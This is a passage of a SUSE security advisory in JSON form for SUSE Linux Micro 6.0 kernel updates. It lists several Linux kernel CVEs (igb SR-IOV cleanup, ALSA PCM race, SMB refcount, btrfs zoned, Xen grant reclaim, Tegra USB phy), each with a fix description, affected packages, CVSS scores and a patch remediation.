AER: device recovery failed\n[ 234.157244] igb 0000:41:00.0: IOV Disabled\n[ 371.619705] INFO: task irq/35-aerdrv:257 blocked for more than 122 seconds.\n[ 371.627489] Not tainted 6.4.0-dirty #2\n[ 371.632257] \"echo 0 \u003e /proc/sys/kernel/hung_task_timeout_secs\" disables this.\n[ 371.641000] task:irq/35-aerdrv state:D stack:0 pid:257 ppid:2 f0\n[ 371.650330] Call Trace:\n[ 371.653061] \u003cTASK\u003e\n[ 371.655407] __schedule+0x20e/0x660\n[ 371.659313] schedule+0x5a/0xd0\n[ 371.662824] schedule_preempt_disabled+0x11/0x20\n[ 371.667983] __mutex_lock.constprop.0+0x372/0x6c0\n[ 371.673237] ? __pfx_aer_root_reset+0x10/0x10\n[ 371.678105] report_error_detected+0x25/0x1c0\n[ 371.682974] ? __pfx_report_normal_detected+0x10/0x10\n[ 371.688618] pci_walk_bus+0x72/0x90\n[ 371.692519] pcie_do_recovery+0xb2/0x330\n[ 371.696899] aer_process_err_devices+0x117/0x170\n[ 371.702055] aer_isr+0x1c0/0x1e0\n[ 371.705661] ? __set_cpus_allowed_ptr+0x54/0xa0\n[ 371.710723] ? __pfx_irq_thread_fn+0x10/0x10\n[ 371.715496] irq_thread_fn+0x20/0x60\n[ 371.719491] irq_thread+0xe6/0x1b0\n[ 371.723291] ? __pfx_irq_thread_dtor+0x10/0x10\n[ 371.728255] ? __pfx_irq_thread+0x10/0x10\n[ 371.732731] kthread+0xe2/0x110\n[ 371.736243] ? __pfx_kthread+0x10/0x10\n[ 371.740430] ret_from_fork+0x2c/0x50\n[ 371.744428] \u003c/TASK\u003e\n\nThe reproducer was a simple script:\n\n #!/bin/sh\n for i in `seq 1 5`; do\n modprobe -rv igb\n modprobe -v igb max_vfs=1\n sleep 1\n modprobe -rv igb\n done\n\nIt turned out that this could only be reproduce on 82580 (quad and\ndual-port), but not on 82576, i350 and i210. Further debugging showed\nthat igb_enable_sriov()\u0027s call to pci_enable_sriov() is failing, because\ndev-\u003eis_physfn is 0 on 82580.\n\nPrior to commit 50f303496d92 (\"igb: Enable SR-IOV after reinit\"),\nigb_enable_sriov() jumped into the \"err_out\" cleanup branch. After this\ncommit it only returned the error code.\n\nSo the cleanup didn\u0027t take place, and the incorrect VF setup in the\nigb_adapter structure fooled the igb driver into assuming that VFs have\nbeen set up where no VF actually existed.\n\nFix this problem by cleaning up again if pci_enable_sriov() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54070",
"url": "https://www.suse.com/security/cve/CVE-2023-54070"
},
{
"category": "external",
"summary": "SUSE Bug 1256364 for CVE-2023-54070",
"url": "https://bugzilla.suse.com/1256364"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54070"
},
{
"cve": "CVE-2023-54072",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54072"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: pcm: Fix potential data race at PCM memory allocation helpers\n\nThe PCM memory allocation helpers have a sanity check against too many\nbuffer allocations. However, the check is performed without a proper\nlock and the allocation isn\u0027t serialized; this allows user to allocate\nmore memories than predefined max size.\n\nPractically seen, this isn\u0027t really a big problem, as it\u0027s more or\nless some \"soft limit\" as a sanity check, and it\u0027s not possible to\nallocate unlimitedly. But it\u0027s still better to address this for more\nconsistent behavior.\n\nThe patch covers the size check in do_alloc_pages() with the\ncard-\u003ememory_mutex, and increases the allocated size there for\npreventing the further overflow. When the actual allocation fails,\nthe size is decreased accordingly.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54072",
"url": "https://www.suse.com/security/cve/CVE-2023-54072"
},
{
"category": "external",
"summary": "SUSE Bug 1256291 for CVE-2023-54072",
"url": "https://bugzilla.suse.com/1256291"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54072"
},
{
"cve": "CVE-2023-54076",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54076"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix missed ses refcounting\n\nUse new cifs_smb_ses_inc_refcount() helper to get an active reference\nof @ses and @ses-\u003edfs_root_ses (if set). This will prevent\n@ses-\u003edfs_root_ses of being put in the next call to cifs_put_smb_ses()\nand thus potentially causing an use-after-free bug.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54076",
"url": "https://www.suse.com/security/cve/CVE-2023-54076"
},
{
"category": "external",
"summary": "SUSE Bug 1256335 for CVE-2023-54076",
"url": "https://bugzilla.suse.com/1256335"
},
{
"category": "external",
"summary": "SUSE Bug 1256450 for CVE-2023-54076",
"url": "https://bugzilla.suse.com/1256450"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2023-54076"
},
{
"cve": "CVE-2023-54080",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54080"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: zoned: skip splitting and logical rewriting on pre-alloc write\n\nWhen doing a relocation, there is a chance that at the time of\nbtrfs_reloc_clone_csums(), there is no checksum for the corresponding\nregion.\n\nIn this case, btrfs_finish_ordered_zoned()\u0027s sum points to an invalid item\nand so ordered_extent\u0027s logical is set to some invalid value. Then,\nbtrfs_lookup_block_group() in btrfs_zone_finish_endio() failed to find a\nblock group and will hit an assert or a null pointer dereference as\nfollowing.\n\nThis can be reprodcued by running btrfs/028 several times (e.g, 4 to 16\ntimes) with a null_blk setup. The device\u0027s zone size and capacity is set to\n32 MB and the storage size is set to 5 GB on my setup.\n\n KASAN: null-ptr-deref in range [0x0000000000000088-0x000000000000008f]\n CPU: 6 PID: 3105720 Comm: kworker/u16:13 Tainted: G W 6.5.0-rc6-kts+ #1\n Hardware name: Supermicro Super Server/X10SRL-F, BIOS 2.0 12/17/2015\n Workqueue: btrfs-endio-write btrfs_work_helper [btrfs]\n RIP: 0010:btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs]\n Code: 41 54 49 89 fc 55 48 89 f5 53 e8 57 7d fc ff 48 8d b8 88 00 00 00 48 89 c3 48 b8 00 00 00 00 00\n \u003e 3c 02 00 0f 85 02 01 00 00 f6 83 88 00 00 00 01 0f 84 a8 00 00\n RSP: 0018:ffff88833cf87b08 EFLAGS: 00010206\n RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\n RDX: 0000000000000011 RSI: 0000000000000004 RDI: 0000000000000088\n RBP: 0000000000000002 R08: 0000000000000001 R09: ffffed102877b827\n R10: ffff888143bdc13b R11: ffff888125b1cbc0 R12: ffff888143bdc000\n R13: 0000000000007000 R14: ffff888125b1cba8 R15: 0000000000000000\n FS: 0000000000000000(0000) GS:ffff88881e500000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007f3ed85223d5 CR3: 00000001519b4005 CR4: 00000000001706e0\n Call Trace:\n \u003cTASK\u003e\n ? die_addr+0x3c/0xa0\n ? exc_general_protection+0x148/0x220\n ? asm_exc_general_protection+0x22/0x30\n ? btrfs_zone_finish_endio.part.0+0x34/0x160 [btrfs]\n ? btrfs_zone_finish_endio.part.0+0x19/0x160 [btrfs]\n btrfs_finish_one_ordered+0x7b8/0x1de0 [btrfs]\n ? rcu_is_watching+0x11/0xb0\n ? lock_release+0x47a/0x620\n ? btrfs_finish_ordered_zoned+0x59b/0x800 [btrfs]\n ? __pfx_btrfs_finish_one_ordered+0x10/0x10 [btrfs]\n ? btrfs_finish_ordered_zoned+0x358/0x800 [btrfs]\n ? __smp_call_single_queue+0x124/0x350\n ? rcu_is_watching+0x11/0xb0\n btrfs_work_helper+0x19f/0xc60 [btrfs]\n ? __pfx_try_to_wake_up+0x10/0x10\n ? _raw_spin_unlock_irq+0x24/0x50\n ? rcu_is_watching+0x11/0xb0\n process_one_work+0x8c1/0x1430\n ? __pfx_lock_acquire+0x10/0x10\n ? __pfx_process_one_work+0x10/0x10\n ? __pfx_do_raw_spin_lock+0x10/0x10\n ? _raw_spin_lock_irq+0x52/0x60\n worker_thread+0x100/0x12c0\n ? __kthread_parkme+0xc1/0x1f0\n ? __pfx_worker_thread+0x10/0x10\n kthread+0x2ea/0x3c0\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x30/0x70\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n \u003c/TASK\u003e\n\nOn the zoned mode, writing to pre-allocated region means data relocation\nwrite. Such write always uses WRITE command so there is no need of splitting\nand rewriting logical address. Thus, we can just skip the function for the\ncase.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54080",
"url": "https://www.suse.com/security/cve/CVE-2023-54080"
},
{
"category": "external",
"summary": "SUSE Bug 1256367 for CVE-2023-54080",
"url": "https://bugzilla.suse.com/1256367"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54080"
},
{
"cve": "CVE-2023-54081",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54081"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen: speed up grant-table reclaim\n\nWhen a grant entry is still in use by the remote domain, Linux must put\nit on a deferred list. Normally, this list is very short, because\nthe PV network and block protocols expect the backend to unmap the grant\nfirst. However, Qubes OS\u0027s GUI protocol is subject to the constraints\nof the X Window System, and as such winds up with the frontend unmapping\nthe window first. As a result, the list can grow very large, resulting\nin a massive memory leak and eventual VM freeze.\n\nTo partially solve this problem, make the number of entries that the VM\nwill attempt to free at each iteration tunable. The default is still\n10, but it can be overridden via a module parameter.\n\nThis is Cc: stable because (when combined with appropriate userspace\nchanges) it fixes a severe performance and stability problem for Qubes\nOS users.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54081",
"url": "https://www.suse.com/security/cve/CVE-2023-54081"
},
{
"category": "external",
"summary": "SUSE Bug 1256361 for CVE-2023-54081",
"url": "https://bugzilla.suse.com/1256361"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2023-54081"
},
{
"cve": "CVE-2023-54083",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54083"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nphy: tegra: xusb: Clear the driver reference in usb-phy dev\n\nFor the dual-role port, it will assign the phy dev to usb-phy dev and\nuse the port dev driver as the dev driver of usb-phy.\n\nWhen we try to destroy the port dev, it will destroy its dev driver\nas well. But we did not remove the reference from usb-phy dev. This\nmight cause the use-after-free issue in KASAN.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54083",
"url": "https://www.suse.com/security/cve/CVE-2023-54083"
},
{
"category": "external",
"summary": "SUSE Bug 1256368 for CVE-2023-54083",
"url": "https://bugzilla.suse.com/1256368"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
